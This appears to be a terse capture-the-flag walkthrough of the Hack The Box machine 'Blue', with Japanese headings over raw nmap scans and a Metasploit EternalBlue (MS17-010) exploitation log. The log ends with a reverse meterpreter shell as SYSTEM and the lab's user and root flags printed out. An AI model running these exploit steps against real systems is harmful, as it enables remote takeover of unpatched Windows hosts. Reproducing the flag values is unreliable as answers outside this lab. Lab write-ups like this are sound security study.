SMBが公開されている
# nmap -A -n -F -T5 blue.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 11:42 UTC Nmap scan report for blue.htb (10.10.10.40) Host is up (0.049s latency). Not shown: 91 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: print server|printer|general purpose Running (JUST GUESSING): HP embedded (89%), FreeBSD 8.X|6.X|7.X (88%), Apple Mac OS X 10.6.X|10.7.X (88%), IBM AIX 4.X (85%) OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000 cpe:/o:freebsd:freebsd:8.0 cpe:/o:apple:mac_os_x:10.6.2 cpe:/o:apple:mac_os_x:10.7.4 cpe:/o:freebsd:freebsd:6.2 cpe:/o:freebsd:freebsd:7.0 cpe:/o:ibm:aix:4.3 Aggressive OS guesses: HP 170X print server or Inkjet 3000 printer (89%), FreeBSD 8.0-CURRENT (88%), Apple Mac OS X 10.6.2 (Snow Leopard) (Darwin 10.2.0) (88%), Apple Mac OS X 10.7.4 (Lion) (Darwin 11.4.0) (87%), FreeBSD 6.2-RELEASE-p2 (pf with scrub enabled) (86%), HP LaserJet 4250 printer (86%), FreeBSD 7.0-RELEASE (85%), IBM AIX 4.3 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -14m30s, deviation: 34m37s, median: 5m27s | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-08-11T12:49:11+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-08-11T11:49:10 |_ start_date: 2020-08-10T16:25:02
SMBの脆弱性を探す
# nmap --script vuln -p 445 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 13:58 UTC Nmap scan report for 10.10.10.40 Host is up (0.028s latency). PORT STATE SERVICE 445/tcp open microsoft-ds |_clamav-exec: ERROR: Script execution failed (use -d to debug) Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx Nmap done: 1 IP address (1 host up) scanned in 40.22 seconds
ms17-010を起点に攻撃する
# msfconsole msf5 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce msf5 exploit(windows/smb/smb_doublepulsar_rce) > use 2 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS blue.htb RHOSTS => blue.htb msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.13 LHOST => 10.10.14.13 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [-] Handler failed to bind to 10.10.14.13:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.10.10.40:445 - Connecting to target for exploitation. [+] 10.10.10.40:445 - Connection established for exploitation. [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes) [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet [*] 10.10.10.40:445 - Starting non-paged pool grooming [+] 10.10.10.40:445 - Sending SMBv2 buffers [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.10.40:445 - Sending final SMBv2 buffers. [*] 10.10.10.40:445 - Sending last fragment of exploit packet! [*] 10.10.10.40:445 - Receiving response from exploit packet [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.10.40:445 - Sending egg to corrupted connection. [*] 10.10.10.40:445 - Triggering free of corrupted buffer. [*] Sending stage (201283 bytes) to 172.17.0.1 [*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:36008) at 2020-08-11 14:10:01 +0000 [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 2780 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>cd C:\Users cd C:\Users C:\Users>type haris\Desktop\user.txt type haris\Desktop\user.txt 4c546aea7dbee75cbd71de245c8deea9 C:\Users>type administrator\Desktop\root.txt type administrator\Desktop\root.txt ff548eb71e920ff6c08843ce9df4e717